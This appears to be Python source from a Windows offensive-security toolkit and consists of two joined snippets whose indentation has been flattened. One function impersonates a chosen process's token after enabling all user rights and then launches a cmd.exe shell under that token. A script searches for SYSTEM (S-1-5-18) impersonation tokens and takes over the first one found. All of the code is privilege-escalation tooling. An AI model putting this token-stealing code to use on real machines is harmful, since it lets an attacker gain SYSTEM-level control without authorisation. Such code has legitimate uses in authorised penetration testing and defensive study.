def imptoken(args):
if args['pid'] == None:
logging.error("A pid has to be selected")
else:
if args['ihandle'] == None:
printT("Impersonating primary token of pid {0}".format(
args['pid']))
else:
printT("Impersonating token of the thread ihandle {0} of pid {1}".
format(args['ihandle'], args['pid']))
imp = Impersonate()
imp.enableAllUserRights()
status = imp.impersonateThisToken(pid=args['pid'],
iHandle=args['ihandle'])
if status == True:
printT("Trying to open a cmd shell...")
printT(
"NOTICE: If not enough privileges for targeted pid, you can't open a cmd.exe shell"
)
imp.printCurrentThreadEffectiveToken()
imp.enableAllUserRights()
imp.executeCMDWithThreadEffectiveToken()
else:
logging.error("Impossible to impersonate")
import sys
sys.path.append('../')
from impersonate import Impersonate
from utils import *
from windef import TokenImpersonation
configureLogging()
imp = Impersonate()
#Get all 'impersonation' tokens wich can be impersonated and which are 'system'
allTokens = imp.getTokensAccessibleFilter(targetPID=None,
filter={
'canimpersonate': True,
'sid': 'S-1-5-18',
'type': TokenImpersonation
},
_useThreadMethod=False)
if allTokens == {} or allTokens == None:
print("No one token found for impersonation")
else:
#use the first token of the first pid returned in 'allTokens'
pid = list(allTokens.keys())[0]
firstIHandle = allTokens[pid][0]['ihandle']
imp.printThisToken(allTokens, pid, firstIHandle)
imp.impersonateThisToken(pid=pid, iHandle=firstIHandle)
print("Current Effective token for current thread after impersonation:")
imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)
imp.terminateImpersonation()
print(
"Current Effective token for current thread (impersonation finished):")
imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)
